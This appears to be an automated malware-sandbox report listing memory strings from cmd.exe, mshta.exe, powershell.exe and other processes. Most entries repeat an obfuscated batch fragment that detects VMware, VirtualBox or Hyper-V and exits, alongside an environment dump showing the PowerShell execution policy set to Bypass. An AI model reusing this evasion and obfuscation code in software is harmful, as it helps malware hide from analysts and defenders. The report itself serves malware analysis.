Source: chcp.com, 00000017.00000002.1444645176.0000020FEB7D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=Oi
Source: attrib.exe, 00000023.00000002.1536728988.00000147258D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OY~VXG
Source: cmd.exe, 0000000B.00000003.1412141310.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=m
Source: cmd.exe, 0000000B.00000003.1419635024.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o~
Source: cmd.exe, 0000000B.00000003.1407403998.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kwindir=C:\Windows,
Source: mshta.exe, 0000001B.00000003.1471594162.000001D061590000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=Oz
Source: cmd.exe, 0000000B.00000003.1431671269.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lwindir=C:\Windowsx=my=nz=oe
Source: cmd.exe, 0000000B.00000003.1437353267.000002C1DCA5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O}
Source: powershell.exe, 00000029.00000002.1870747846.000000C0000B4000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\schtasks.exeTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32
Source: cmd.exe, 0000000B.00000003.1421629608.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o\\
Source: cmd.exe, 0000000B.00000003.1409544421.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common 